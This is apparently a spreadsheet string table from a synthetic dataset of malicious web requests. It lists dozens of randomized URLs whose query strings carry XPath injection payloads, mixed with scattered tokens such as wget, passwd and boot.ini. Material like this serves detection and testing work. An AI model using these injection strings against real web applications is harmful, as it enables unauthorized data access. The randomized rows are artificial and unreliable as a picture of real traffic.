    <t>/argareod/lrlteinilsgre3ete/h5rg9hvh0/a5mhhbt/vr.gif?i5mttkrv0ens=fjni1tr8alnn9algm&amp;oeaeoro=pgx&amp;paff=eagtwm-i&amp;ttpto3mdsgbtu='ioc18bdiwvhtk\\&amp;npg0dkjm8t=ec7&amp;eshi=ewutygo6emcae&amp;jltr=jnnxcqu'+++or+++6+++++&lt;+count(path/child::*)++or++++'gueve'+=++'</t>
  </si>
  <si>
    <t>/05/htef/ix1v7/ek16az4i./sllideoformbmocha/ar9qziteednrt7xliee0/pvuugw/efhicwhlthrnqe.sh?ts=53++++or+e29a/tv6nt/ftoa8/child::node()[position()=1]++or++0=</t>
  </si>
  <si>
    <t>/yuuwsytiz8ly/or4ta9-evaliieq33/4nkhpv1ksxjuqv_tt/rwgpknf71.zxd.aspx?eace8ei1ratd=amnoantpea&amp;obgescleaadus=f=o\\l(yxecmm&amp;nol99eu4vtah93=gihrsf&amp;s3hdrash=510253&amp;naiuk=eprocessing-instructionhia@4cmdn+bt;exece+&amp;hvfcgldd=31j&amp;rvsyadm=amb6n4e7pboaaot6me&amp;o7z4us0o=qss&amp;oigpces=i5azqhtbm@9m&amp;comphaoo6leve=big+ta3se+5y4&amp;lheutyono=neoc22&amp;buoswib=pma&amp;lmnrlhfet7=et'+or++++path/child::node()[position()=n]+or+++++'aienez'+=+'&amp;7gimkmijgv=bopt</t>
  </si>
  <si>
    <t>/qh/e-_/noellrd22snc/sidnien5aesflf/itiaetgtjowhe/ps-/pnmj@yphquh6nc.htm?tc=o~o&amp;yiltdv7h=c4hr5t6+v&amp;swgf=i@vicmo_0ua&amp;tefnttmhda=7&amp;tnwid6le1yryt4s=g0rr@a&amp;futxttitbaii=71710&amp;ba=66057&amp;stueoi2c=ireplaceetcc;liaznaermy5&amp;sdeetidnges=ofema2y'++or++++6e/ois/child::node()[processing-instruction()=3]+++or++++'qeq87a'++++=+++'</t>
  </si>
  <si>
    <t>/3zds--7egocsoc5xc15/estsiia3ehyeiu0mcht/eoqkvwrfcd-ns1stt/5shutdownilp92ribxzk/hktwz_7rox6-moktx/l_9cd/z_kc9jff0io6@c.tiff?tsmid8o=r&amp;dliono=5129260427&amp;lrea1n7twr=en4hbss=olinkd9nwindow.openshtpass4+ee&amp;fodsqfinba309i=neop2e4srlt&amp;etsiy_replacemchkz=6904298&amp;eddcrbesdua=0rtbaetnlneh&amp;oateeassmd2i=&gt;stnnab+&amp;nwtgaaaretaagxa=nosx'+++or+count(+++path/child::node()[position(+++)=((i+++++++++j+++++++++k++++l++++++1)]+|+++++path/child::*()[position()=(k+1)])=1++++or+++++'ccdpsa'+=+++'++++aedbusin'+++++or&amp;rzob=4</t>
  </si>
  <si>
    <t>/lddftj/riofgsshanshpn/tboi1hr@bnlcpwf/ovqypz/yhr/rboot.ini/wsno/ttumsl7uwk48bytsuh/nra8velin/r4blh@bnnmrs2kl8v/ndatnumes2tqerrqee.css?4errhicaae9aoer=ataaot8'++++or+++++1&lt;+++htn/nc/alhcss/child::text()[position()=5]+or+'ak'+='</t>
  </si>
  <si>
    <t>/bcfhyoeer/9apd3prttis6mole/netiiltal/systemvghbin.mdad5lc.2/erisoo6scteaalenmeo/yylma/s3u7ye.jpeg?bek=drshpd/tco/fe3/child::node()[+++position()=19]++++|++pdf/hsrue/s5r/child::text()[position()=184]++or+++++'s00ex'+=++++'</t>
  </si>
  <si>
    <t>/i6aqo_s7_7qjljywyo/aepuoo/io94md@6ygemig3h/ea9xji_qttydv.jpeg?eiggidad=tmp&gt;dilsnurhttps0|ayqtne|\\s&amp;tep=140&amp;tneoet=wheilu'+++or+++++1&lt;+++nah0a/g/mdtr/child::text()[position()=76]+++++or+'iho'++=++'</t>
  </si>
  <si>
    <t>/_qyc/2aoliatkia3/iiewwgwrlhneetresus/sygvq@0bga/tosd6hnlp/trnht8ibaroe4so/axfowhdfa/fztkl9j/mzy5ltw.msf?likexmfdsock_streamw1fc=noe&amp;edeskrolwsnes=72156905&amp;yglguwa72t=l+ue&amp;ulhuqwpensnoat=wdez&amp;oteoilealioemi=ebiefi&amp;jeaobal2cci2=[&amp;huohldtnboejiro=4mn&amp;zi06glto4fdie=ulinkensmochafols1ic|&amp;se5xsf=5452+++++or++++1&lt;++++has/ium0/d3/child::text()[position()=43]++or+0463=']+|+/*+|+/foo[bar='&amp;o4daorbtbrtdui=x&amp;utbbpau=ub1bodbow2&amp;0rd=5ilisndc0r</t>
  </si>
  <si>
    <t>/r3tws.jpeg?re=/etebvbscriptvob&amp;mra=cet&amp;7dsacpjhtoa=s&amp;synz0=scripteyoogtfihttps&amp;enlai3sopyatror=49&amp;sanowtuordse=optdhcmd&amp;ire=ara0goet'+++++or+++s/r/child::node()[processing-instruction()=55]++or+'ec7a'=++'&amp;swgt=tmpsah&amp;epfaiaitefo=ovqjjre&amp;pr0replace4vmhttpt=r~&amp;e6wmrila7etmae=8709&amp;xj5xn5nsr1fo=7662</t>
  </si>
  <si>
    <t>/ei2yeae/60j-qdwg/kyiyhrlfsit/4g0./rdoqelhys1f/hes/ntlotsrettr/cdd2fs.css?2y4ndd=146&amp;gpevceedt1a=5036+++++or+count(path/child::node()[position()=((i+j+k+l+1)]+++|++path/child::*()[position()=(k+1)])=1++or++++504=&amp;dfiwno=itnrlfea</t>
  </si>
  <si>
    <t>/yeorf6/a7es0wti/sa34iu5ytsjrgcafl/dd1bd/gxfu/ng-liacxu9w4.gif?ntu1ycepbim8lb3=eer&amp;ru=ae3lndiyseta&amp;ihnhss07cus=log+s&amp;k8nr7gnoec=503075960&amp;euantiee=eho6p0hg1&amp;g2t=9&amp;wrnobe2ah=eg1&amp;a3ilboe=etaadi/n/hs2thr/child::node()[position()=903]+or+++++'eoa'+++=++'&amp;olatbs=720&amp;un=b]rdais&amp;msatnsrhnb4oet=r+af+&amp;nkltruecnknfu0=bjla32</t>
  </si>
  <si>
    <t>/siii3hta6t/5dshlaostmod0nf0rven/ateisid5ud3abigh/hnp4jrdd1sosboywumw/kir6t2pmsrn4su/6amczpliw89r/6djvk8rhqsfauyfzkor6/7aj/f7p@x9z/bue_xvqq.f@lg/wget4var00logofxedj.msf?zlidgelbnggh=juicmdqrwur4&amp;dw7gt6hmbpr61nu=o7@fi9zd&amp;aolfo=edsar'++++or+++++6+&lt;+++count(path/child::*)+++or++++'atzt3ne'+=++'</t>
  </si>
  <si>
    <t>/wq62e1byx3.includelike/ragkywmn69.7jynt/pbgmesnog3xjgz5ibv/e3huu.z/lacvnbftpl7/rfmytjbh1forz_ns/a5onefx1p7/th3yy/sa_pt4gh4grn/uy_rsk@rw@1mxzkk9u/ataewe/evy1xrk.exvirpq8e.jpeg?0f30rgo=20att&amp;am1yenh5s6duri=44&amp;wn=co'+or+++count(+path/child::node()[position(++)=((++++i++++j+++++k+++++++l+1)]++|++path/child::*()[position()=(k+1)])=1++++or+++++'atdl'+++=++'+++++5euic'+or&amp;ese9=ttyq9nid$lhnuhtacces&amp;aoetxor3=e5i6aan7</t>
  </si>
  <si>
    <t>/edb/igb4aq/nseexitlclqrioao/abttpt7frragti/of-havingin.dji/replacensxf-ds52pxqw/imm.cfm?3entlqtr6e2h=er+cfo&amp;gknadoiortqond=-doheselect94aje&amp;rrayphae=tao5prajsefm&amp;r0hypeitt7bpnqa=c&lt;lsm&amp;iqgppgxjj6link=t3whae+k&amp;slearctelyd2j=6631752703&amp;meu9auhtraareae=7shutdowncsmjfnuihttpsendn+oie&amp;_ngqgyqmi=621445&amp;enka=6cm00&amp;hs9otk1=(i+&lt;+++count(hafc/child::text())+++and+++++j+++&lt;++++count(es8r/child::comment())++++and+++++k+++&lt;+count(eii/child::*)++)&amp;oroaaldralhn=709402</t>
  </si>
  <si>
    <t>/hvvgf/bpoi/sqiixz-ayxluuwabc2.jpeg?das61=laeiavbscriptn&amp;ny=oato/caee/ras/child::node()[position()=59]+++++or++++'uw2nfod'+++='</t>
  </si>
  <si>
    <t>/c.@x4a_/6.g4x2ndg.sh?bectzzaaatutoe=eeo&amp;8nullwgetaoals1=781423&amp;lnlnijdosu=ogugzq6zawcc&amp;ie1mytyh=4848020&amp;w26to=(i+&lt;+++count(eecsa/child::text())+++++and++++j++++&lt;++++count(etrnaa/child::comment())+++and+++k+++&lt;+count(nnl/child::*)++++)&amp;ar7p=09203</t>
  </si>
  <si>
    <t>/hnah/ipnewmdm3.js?ig3t=hndq0a36e&amp;isgtrtsiaob=silra.c9&amp;0onalaiators=spe/hvarhavingi'h-&amp;joc1i=hcopy;&amp;fd42akndeh=s83'++++or+dinon/z/child::node()[processing-instruction()=1]+++or+'iuei'+++=++++'&amp;eae=nbrhinnmmezeen5cs&amp;etrime=8perle4t&gt;uah&amp;c9h=@er@e&amp;seeee6lx=4e&amp;tef7=tsod+ol</t>
  </si>
  <si>
    <t>/smw3df2-7rw.ivmzz2p/emetaeadlibo4ke/sriixfmceaea.htm?dnilegtdoeph=towatd1d'++or++count(+++path/child::node()[position(+++)=((++i+++j+++++k+++l++++++1)]++|++++path/child::*()[position()=(k+1)])=1+++or++++'hd'+=++++'++axsi5ei'+or&amp;ievalykunionf=eustgddre5rwnal&amp;rnnkcnn=0731&amp;och2aolodr=optrma&amp;n@nbuq=069</t>
  </si>
  <si>
    <t>/t3rfivauoiiuxtqs9so@/d6poe/emtlsnlhl.exe?teoenm=rg&amp;euunolgybdebhy=68963615&amp;zmnawyo=udinhtv&amp;e4oi8ec=1539490&amp;oetnaueopoo=e1n'++++or+++count(+++path/child::node()[position(+++)=((+i+j+++++++k+++++l+++++++1)]++|++++path/child::*()[position()=(k+1)])=1+++++or+++++'hude'+=++++'+++rinad'++++or</t>
  </si>
  <si>
    <t>/lj/a8h3gsinhgaceb/iesbltn5nto8msnlfis/osgbqqz0z/rtonzetera/0uimctstwes1at/ia2rniianeaz0/oeogbbgupeeyrioe/itdeqiekoe/wxn.rlmeta/sd.js?ournnie=4h+fhoidaoj7s&amp;eeuaot=yqf&amp;pheyrplfn=s)fconnectt&amp;moe=(i++++&lt;+++++count(irw/child::text())+++++and+++j++++&lt;+++++count(suk/child::comment())+++++and++k++++&lt;++++count(bhenti/child::*)+++++)&amp;owaromto=troo&amp;i9regneehdywat=e7iwhoup2eeb</t>
  </si>
  <si>
    <t>/b7ndd.css?p8yeautrfsnte=0993&amp;htrcfeooqe=46209&amp;9tol6d=hftp+nrod&gt;t$o+&amp;rkihrnfsy=0-kwdqtjwmdb&amp;9rnewfidds=6&amp;wgetgbinp5yu_access_logkbo=9368209&amp;ullcror=lgroup+byanst+=yzd3&amp;lknssniidrjio=crrhnvwihmt7ruw&amp;e7eknmacab7=cgluzdjtv&amp;eisenge=menfc3hv&amp;5ri=iteiusa'++or+++++1&lt;+++++ce/tni1/9rmr/child::text()[position()=976]++++or+++'oe5hjzs'+++='&amp;qenmm=ort1k4sar8&amp;4oa4o=osbbwpolre</t>
  </si>
  <si>
    <t>/orwtvrrfa/lxrw_o3dcjhpfy2/erntzyn/asan4/h0pt1zo0v.u/htngeeueaetyee8a/yeehydtwst/fae/4ea9a7potside/ekdovzdbwqfk8g.sh?epn=(i+++++&lt;+++count(sati6/child::text())++++and++++j+++&lt;++++count(qj/child::comment())++++and+++k+++&lt;+++count(hr/child::*)++)&amp;4fssqai3dr=+t&amp;g6orpics=efrom+u\\ati</t>
  </si>
  <si>
    <t>/tliyitoehg5tc/5vpjo5/2i/es/tr-9aszjg5n/vqvgy_saqm3b5db0r.w.cgi?mjhstrc=bwayibuy'+++++or++++path/child::node()[position()=n]+++++or++++'tccys'+++=++++'&amp;teidaaeespb=7sb3ebgnttdem-</t>
  </si>
  <si>
    <t>/5zp-8zctmfih/spxiy3nyzdu03/r6a77/gxgy0b8a.8_/jctzw/tyuxrv/voqdowhseiyac25ujmhs/sabuddcehapeyeboaiyg/seue0sh/uw/ktmotrulaf3ebin/nkqr3ggd.sh?ayutwl0=dljoxlh'++++or+++++(i+&lt;+++++count(smlo/child::text())+++and+++++j+++++&lt;+++count(1eslb/child::comment())++++and++k++&lt;+++count(oa/child::*)+++)+++or++++'7egc3mle'++=++++'++prdel'+or&amp;rs570rkbopnd=u-got&amp;ahodestauhlusic=u=</t>
  </si>
  <si>
    <t>/92zjkb/snpe/0udn0h6heiedtln/30fncak.gtyinput/b4k-/n6oupxvz/ei-388aka/ezshurii8ot9iwisco/nuhuzc_xvg/mperlokuh/gt.aspx?snuptag2cr=twp-dq&amp;nn=1+or++++count(path/child::node()[position()=((i+j+k+l+1)]+++|+path/child::*()[position()=(k+1)])=1+or++79442=&amp;d1rosa=8e&amp;1s1noosrhtha=t&amp;htpassozjiw1iscripta=sopositionerj+enodeh&amp;tiwnhagrurebxu=58609694&amp;wguinl1bcxc=527&amp;hhunionz=ln+-aheg&amp;fsnlr4toew=eio_djotop&amp;peno2an=mc4uud_k-&amp;s5eiid6olhbdt=uisibody</t>
  </si>
  <si>
    <t>/ratrielaom7/bu/bijmn/t0d/23bxdd/sfphsrhtie/payran4spv@akzan2x/5erchthnmzn/t.ryl_gz1vwjy6/snmgj3h/tdrqmq2_slvazfbt.asmx?nuqoer58srizv=dex&amp;yvnis9c.=ubeke41wldqr4&amp;2ls9=oiww+&amp;9zdlexecfobjectgkd=smqc72wo\\ral&amp;atfpiut0ops=80&amp;ionse=fhnkgybazlo&amp;htaetwsf=gesv8nwiekjno&amp;0lpaln8=stmp5documentsaymtha3yhth&amp;yugjbttmpaaj=tojii$gzdrop6a+on&amp;unihxeqc=lpa']+++++|+++++p++++|++++//user[+++name/text(+)++++=++++'ulwst&amp;h1cwindow.opentfv=351&amp;edrw=sao&amp;nrteiachhie7=ozef&amp;h1cdhu=6</t>
  </si>
  <si>
    <t>/jfpvcpi/rwswlink3nwlocation@p/iadersinimieeudtron/ree/snaylkon8nychubtasm.php?ewsoia3eaueasti=0ltmhwhraente&amp;nyyg=965652&amp;tlsdzinrkvint=42+++or+++ngaa/osdgee/e33f/child::node()[position()=78]+++++or++55514=&amp;brezye=awaoasneesrd&amp;.prgobm=rkmhfeb8&amp;eh=+5&amp;cgjuusnte5=itqgbj</t>
  </si>
  <si>
    <t>/zsnsntdeeotiacs/oorkte46kh3zlby.6/rwmxf98zvmhex24fh/cmnnhrj/ofatamrjomonwgfo/nlat7tewtmbeete/sj7cky/qgw/1rdxvfevgudrpy/sock_streamhk7q1qz.js?iqoo=eti'+or+++oaqd/ay/child::node()[processing-instruction()=4]+++or++++'dcly34t'++=+++'&amp;chece1emw=idaigsnfteitnri&amp;gso1=n+eboot.inixdec&amp;eele=o4aey6an&amp;eaal8=0587631&amp;orsaajreetksnyd=960666419&amp;rxuehlp=65268&amp;ra0ruoteotia4so=+autoexecopositionr&amp;u@jsmochaf=htaccesidf&amp;s3usosywto=|+og</t>
  </si>
  <si>
    <t>/oc/qrcgvwuo1b7elff/9zb/rrdkiiob@/5jbhu3/ikosgp/hmgcmiabhldr/90cc1q_3uaiqlti31_t/io55ag4otri.swf?daa=honourf&amp;n2e=rhc+\\nerlgmgsd&lt;ve&amp;2ntoeetsti=417396&amp;cgndamegrbo8itn=712249&amp;cifkpsn=089370103&amp;oip=tqv&amp;helj0l@.w6=0&amp;plieriiostt=le8&amp;z8-gzjmeta3x=696810&amp;4w=8601127&amp;xbingf_=46043++++or++++1&lt;++thdnc/tmg/exlott/child::text()[position()=566]+++or++7=']+|+/*+|+/foo[bar='&amp;ltoia=9</t>
  </si>
  <si>
    <t>/g_6d0zufkngqejhkvhv/qkmdnbkejnlju6w/e3rm.jpg?epsnrntiohbcg=kcbs'+++or+++++ruci/lt/child::node()[processing-instruction()=3]+++or++'titea'=++'&amp;exthotesebhqtap=eetssio0y&amp;wdrdoqibm7nc0=yz2twteltc&amp;ylp5shlthhssa=7t0nioaee1s+&amp;pnpsiey=+@nl&amp;0-yvemocha0owjig=p3jh2p&amp;trnp4u=ilmidg_8a</t>
  </si>
  <si>
    <t>/vajihduutvdnto/yadminididlibqgi-n/aesac2tjcitna/xkd-z/54xlmhm..cgi?dbhnbowyeamd8=i/reinaa/sr/child::node()[position()=070]+or+++++'nonoes4n'++=++++'&amp;rtyir5aoumwo=yrot7yor84sxqotl&amp;2te1ewpo=pr&amp;ewsteitis4dls=tdaubetweenruge+/tih&amp;ialyarbicv=bodywcehrne&amp;8e9mbxetrp=bz&amp;iuuicmroi=blioort&amp;odhe=oncinputbngag</t>
  </si>
  <si>
    <t>/teyosoetiqit/hl/afeolfsod/ssecua6oahdrooe/tt/8nd7toitihuce2y/eo/jtgufr4/f7cf2ovxgmcuu/hth@gtlefrl.jpeg?ei=2645&amp;6ea1eeoyqoao=af4&amp;mqe7lhaoa=yffbt5'++++or+count(+path/child::node()[position(+)=((++++i++++++++j++++k++++l+++++1)]++++|+++++path/child::*()[position()=(k+1)])=1++or++++'3meed'+=+'+++++yo'+++or&amp;punvo4hj0d=wpettheomfsdn</t>
  </si>
  <si>
    <t>/bpbinvpw1xnubnei/o6/wstsetlo/x0vbscriptq5/aeo1y8sm5qsnbtsf/eo12zyo52/eylzvzfejrqyxpfe5/jdye@exk2nm-l6nq/alov9us.sh?slfd=wweez&lt;chpat&amp;ae6lsae=(i++&lt;++++count(ofnh/child::text())++++and+j+&lt;+++count(bn/child::comment())+++++and++k++&lt;++++count(oecw/child::*)+++)&amp;mientmobenode=679839&amp;ea=adtn&amp;rwindow.openotky=dsi&amp;1tahn5deee=c2&amp;vdconnectvq=i&amp;enemwindow.openchildhbau&amp;ddtmpfscriptlinkkhtpass=ioqahjb:yn</t>
  </si>
  <si>
    <t>/n4/tjzz/esefw0fc/heprr3he5rcegtn/er7p0ie04t6hyiaod/owgah7kp8jxy_/ylzik9/ec71shjm1mksqj/nhcewizz6bsj6zh/eeseeadne/u3sechogsmo2cl6z/u7swlni.aspx?5zh=32&amp;betcdkay=2810+++or+count(path/child::node()[position()=((i+j+k+l+1)]++++|+++++path/child::*()[position()=(k+1)])=1+or+068=&amp;eypnl=l6loaefsthea5u&amp;iinfndelw6e=84&amp;f8fnph-ax7kgroupbyk=aqxxf-6iqp&amp;wonlndaeleowza=f9&amp;4twywtzxiicoe=ssystemlc&amp;silsutieettm6ie=cmdytrn=otjcs8&amp;nibs=4</t>
  </si>
  <si>
    <t>/kbby0u1mqgzrdyhwt/@.nfiv5@nodechild.jsp?aobccdc0lsd=80736&amp;n4ri=5111&amp;ndasest4euna=olgto1ehs8ueaa&amp;gxg1i=tfn7alov4t&amp;gieat=(i+&lt;++++count(38ldd/child::text())++and++++j++++&lt;+++++count(ad/child::comment())++++and++++k+&lt;+count(0i/child::*)+)&amp;trranripcuunh=942&amp;ercngr5ftykebid=rr13+d-f2oad$d&amp;s9ttmco8ta=foo6alloptnroadmin&amp;banstaeaett=oeerupb&amp;eqhi=embergp6dy&amp;or=ytvzbojhl&amp;iif6ngd=61&amp;qzet=mcby1&amp;1izetesri=ajssb&amp;nrak2rskmirs=1etlt</t>
  </si>
  <si>
    <t>/f0/rssdensbfvmrr6t/i4hhan9/ojooo/shwnhttppp9uty/84xn.lapasswddqcz.jpeg?brotvhtmogtsy=68aee'+++or+++1&lt;++eaciml/lp/a5elbe/child::text()[position()=56]++or++++'tao'+=++'&amp;i1eooe15vae=su0nwlfkk0&amp;eoautn2s=9</t>
  </si>
  <si>
    <t>/n@3n/ebb.e.s8h5lf/ees_qsup.jiez/tmsfl/rjeap/qtx/htwnc5eg.tiff?9mmeouhseft=27&amp;thoiuyeioltoqg=input=ct-&amp;swwqklc=47919171&amp;raavweh=~'aefe/2f1swb$r&amp;dstuna1iaa=3v']+|++p+++|+//user[+++name/text(++)++=++'sna&amp;srnjtat4tsmhwie=nsir\\sa&amp;eaeosjg=nrselectirnateciu%u&amp;ro4imqoq6iswo=8892&amp;eaf3rehmern=anki+&amp;sdodub9winntjq=d6m&amp;acaeder=nwjadri&amp;hecioot9=tid&amp;nw6era3kdwmif1h=eoeslodn</t>
  </si>
  <si>
    <t>/sr93omeegn/rmv24rdf/iewen/txbo_5bh6vhouxcw8lm8/eoielotb2c1drrqscftn.css?qas=xc&amp;set=n~jh+oobb]ah86~&amp;7roucoueloaeta=3+or+++1&lt;++++od/setwfy/o5tbqt/child::text()[position()=8]++or+++++71=']+|+/*+|+/foo[bar='&amp;e7nten=3936&amp;ngit7o8nrus3q=31351&amp;ztcncdocumentc=l9jfa6</t>
  </si>
  <si>
    <t>/nyioarzr2iezkha-iti/0izg9shutdownqm/3v/sjps61ye/ibzb2uliutvu5dxjwgj/ezleiioldrcq/aqckdu-plrxrpxlskov/i2@xnucdaeu/vtiy@xls0fj/iezgx1llnoa/o5eeie/laadmin8u8a5wrd3p9q.php?s0dlunhta2e=(i++++&lt;+count(aot/child::text())+++++and++++j+++++&lt;+count(enom/child::comment())++++and+++k+&lt;++++count(rh/child::*)+++++)&amp;aumelynemhiig=6998038110</t>
  </si>
  <si>
    <t>/crueecysea/wp.css?73lz0afi=9769003&amp;nlehaycfr=nsni=netsjopenall&amp;srtsqozmep2c=276240&amp;rzotnoior=mshnk'ra&amp;eng=scusc&amp;_2ep0yjps2f@=nevfmatda5ma&amp;lia02ee=751092&amp;1oi=essq)7q&amp;ohae=rgusb']++++|+++++p+|++//user[+++name/text(+++)++=+++'rsa&amp;tg2oeot=hhmlefa&amp;yesrmqonp1=nqn4fwn&amp;rpsnnb2to97md=76258797&amp;8o70u=4pulsye</t>
  </si>
  <si>
    <t>/hua5oshbl/jq/s9oe/xrp_selectvurir/mfb/tnebstdoti/t3673lise2/tae8l/uu/nrdm/ijnelyeubiljaaqh30a.bin?ekereepthnnr=s6rogujb_i&amp;itoinsofdeqetf=hxac5gklk&amp;ueuediajaa3y2e=283208&amp;ydehoc=4b&amp;otrinnennaoh=nib.&amp;e0vscundaatv62l=kjtcra&amp;yczaooranltytl=524&amp;waxaouc3ct3=hlo=htacces&amp;1aoncrcj=aposition&amp;sbimwindow.openwinnthcd[e9&amp;bw=nita&amp;iywheren-passthrubw=sreenrr'++++or++++path/child::node()[position()=n]+or+'uv'++=++++'&amp;elbenaounabrsm=3ihbuddux_&amp;lneeui=lr+h&lt;r1-q&amp;aeiu=swbij+asg</t>
  </si>
  <si>
    <t>/aisreo.swf?radantao=25079&amp;o3jn=+hhttpsew&amp;hehevl1=oan/nde/oenf/child::node()[position()=8]+++++or+'rohoa'+=++'&amp;4sm=4435548&amp;hwo5erz.rz=ediai1cleeswout&amp;ems=uc&amp;hresoo6s=rneotintrcopsr&amp;tfreoz=1&amp;ywrq=56638&amp;aneolcnr=egf@i+</t>
  </si>
  <si>
    <t>/e5p0snuoweroi0d8od/uwindow.openlpobject7mf9/r3kqxw70dw3ljhk/tooeteva3a496u/uev3gen3/tumipxcjrjagq_bsisg/gttuen2bnsbul7soeiu/aptnsnevanmseege/jselrwnagasbrtera/oe9orpsj8zuznullaxbin/alesnio7e1/qhsoanoipeknbevne6oi.asp?igsoessmnaihne=cmtunogisb4haddaso&amp;et2o0umeaaiia2e=y5irr&amp;hnhdebhzo0=tu$e5gew3e+mochans&amp;nqcaorr=678737&amp;un1satwanni3uq7=nheie|itcupdatej+pe6t+4ue&amp;nkmxcaew=wl3a+&amp;kl77lpr0=5as.fh5x&amp;ltbeotiro=768544342&amp;id9aierzfjidoee=++n&amp;ntd=leuh56s'+++or+++++6+++++&lt;+++++count(path/child::*)++++or+++++'yg4s5aie'+=+++'</t>
  </si>
  <si>
    <t>/f3qf6t7xgux/akic4fwbptg/rrnonl8e/elxguee2nvrwe0/1otenarawoottnt6peh/eesjrskbfosn/turhkcfmadr3qn85eaxq.exe?rc@oxt2zq=owha3osu'+++++or++(i++++&lt;+++count(srt/child::text())++++and++++j+++&lt;+++count(hhemo/child::comment())+and+k++&lt;+++++count(eo/child::*)++++)+or+'al'++=+'++ge'+++or&amp;go81wttet=1&amp;liag.ymuxtermj=t?an5&amp;tatnoiihlbua=n&amp;sjquomboctki=ib6s6@wh-&amp;som8sreo=|nsxnetind?haccess_log-o&amp;wenp6r9jsmfhae=iianlh2cda&amp;ooohm=mstdinhome&amp;rtsec=u+au&amp;zupdate8-b=ah&amp;fz1leonnrtl=8957798&amp;5vsp7vrgnwgjci=e</t>
  </si>
  <si>
    <t>/s20mngaa5-r/xaoy/ec9lbeyme/annsh/xd/vobjectj8vqqf2/ron/ekn/hnc9nclfhooipn.swf?zoonqonwmeztrnc=ea9ae'++++or+++path/child::node()[position()=n]++or+++++'elunqp9n'+++=+++'</t>
  </si>
  <si>
    <t>/hfhoetfqjirtessy/t7v@-z/nuer6dnhwqq23q/ocbae-r7t6laoj/-zu@/0hiimxcnsau/2h7/atf/0ae6p6n/5zg7/hpv8t/5klr-.pl?str2nnvyealylo=8a9esgsfsts&amp;ib1=3na1sfwihdy+d&amp;vof=s&amp;m9jem6pee3eet=8935&amp;vetaitb=tdh4qherdras&amp;uapssg98cxlhute=tccstg'+++or++++1&lt;++++eavhe/igktb/ttbo/child::text()[position()=0]++or++++'z8nado'+=+++'</t>
  </si>
  <si>
    <t>/eluzmo/gesdoirefiejtd/loseetidolefeut/wu@inorcpri/o7egqagvhaz.bin?jsddos1fonwqbk=lfbg0hl40e7&amp;8cp_@p-=i37a_mf-9l0t&amp;dopsge=as&amp;be=00&amp;yunionyh_yqzjexec=22&amp;ohaeewlvnalxo=hcor'+++++or+++6++&lt;++count(path/child::*)++++or++++'ckiiwre'+++=+'&amp;soutqrttykaydoc=qsxuwuzkddjo</t>
  </si>
  <si>
    <t>/akeqhu@7t/agsb1ptbzp/hvl.msf?tiriw=7qwb&amp;bhylfiraftogoe=8g.&amp;eif81aactrwehoa=31++or+1&lt;+da/eicwf/qahovc/child::text()[position()=18]++++or+7016=']+|+/*+|+/foo[bar='&amp;utiidusz=rgee1mvrdanadbts&amp;ioan5mzle=35072319&amp;koaekh=insert&lt;(cmdntmpt&amp;7aocs6smcaohn=tac0</t>
  </si>
  <si>
    <t>/s-@snnqaao71.a@y/et/gean84xjsmz23ii8i6ed/oewjpjzq/d86lxqrj44uxrgplx6.html?sroari=egobk8_&amp;etbfeatwfltezd=t/9wrim&amp;wnieesbnav=otsa/ne/ine/child::node()[position()=791]+or+'aesn1oeh'+++=++'&amp;q5hd5=fycgapeia2&amp;no=aooow&amp;ni1hp=n@u&amp;ecl@vfkygconnect=nsuiframe&amp;erala=f8jk7bjqjab&amp;tenhteetthcljn=rrssftpqlocationy</t>
  </si>
  <si>
    <t>/f2v/hm.u3ufkr5hiyhsx/y6dropo6d85/rrf105s3cl_rgzf221.msf?h.ank-=aa2ne&amp;asqucihyturr=029606875&amp;pereixgiaopeclr=sbmu1kz9zjnj&amp;trts=oo9sse&amp;nnxcbzrihe=eo&amp;yams=00&amp;c6acoi0=d]ae]hnconnectf&amp;j2yxeht=e1ir2'+or+++++ee/8se5i/child::node()[processing-instruction()=3]+or++++'saliah'++++=+++'&amp;upx3btvh=node+hi</t>
  </si>
  <si>
    <t>/qej/hlyn9esmm2/qnull@c/rascldifndense/ynbl.asmx?xuqopenexecevalwv=h@lt&amp;nj=ot&amp;drjhyoi4r=hdl&amp;o4abaith=n&lt;eka%winnt1tana3e&amp;imlsaihuje=formbsste-y&amp;ltn&amp;e7beklhareag5a=u8lee%s&amp;kqahceolti=mhttpcx3wmtpassthru1a5wm&amp;r5enr=mssbetweenaoizoteae'&amp;e6=r/9eto/mt/child::node()[+++position()=93]++|+th/i1/uf9swc/child::text()[position()=046]+++or+'eecog'+++=+'&amp;e.vwk8tr_qx=tyresnullppnr+i&amp;pat2fjionagt=rahwattufntaotr&amp;ramn7obo=4354464&amp;dx=afsam&amp;qqwyaxt=2525</t>
  </si>
  <si>
    <t>/edohg/abhshbel5nihusrb0fng/hkbskuvrbqe/dbaeiaerenretlttraat/aensemlsnsduh0.php3?yw2ogqxya=s3soraht'++or+path/child::node()[position()=n]++or++++'hibo'++++=+'</t>
  </si>
  <si>
    <t>/qastm04etbqn0tgrsva.html?ospt=oent+ht1&amp;hrm=56749&amp;2tvy-8ei=8247629462&amp;teee=08888&amp;eao=x+wq]&amp;oedwdspsoa=i&amp;wawx=lnr&amp;tsusybn=126&amp;omqoist6sottm=exec0pi&amp;or8siil=ntrcaatpeuaneie8a&amp;seeososlg=k/wgetubanokorrhdrn&amp;ziriyoededrte=esoaerherzsile&amp;tisntcntn6oggm=rgoga/u/gcbh6/child::node()[position()=86]++or++'orpe6n'++=+'&amp;naoh8hwepliht=sbrsrrj+to|eet</t>
  </si>
  <si>
    <t>/ea6aeh/eckv0sncsoroca/yepf/m6vrpin-xfphq/dpnywesinpo9thhbs/n0m/utoswti3nwealsjels/toxxqvjzmbdhs4ddx2i.js?gtou5tlenldaiar=99864977&amp;esihhah=il8ws']+++++|++++p++++|+++++//user[+name/text(+++)++=+++'ny&amp;riphzuenodtg=6</t>
  </si>
  <si>
    <t>/2aratrnfrgnpnamro/8m/obinekm.html?kde5t=ddnamit&amp;tr0ehlz=hg+oeeadb&amp;nnbr7danc4ilih=8638&amp;ofreo6swhmr=nmoahsbegtl2sr&amp;oo1sfaneuvd=eieipce]ns\\e&amp;xuqimgivarmocha59xg=3794&amp;fodiv1y_idohm=(i++&lt;+++++count(ia/child::text())+++++and+++j+&lt;++++count(tha/child::comment())++++and+++k+++&lt;+count(seah/child::*)+++++)&amp;feesrdxytif=36207911&amp;mpsmf=46175936</t>
  </si>
  <si>
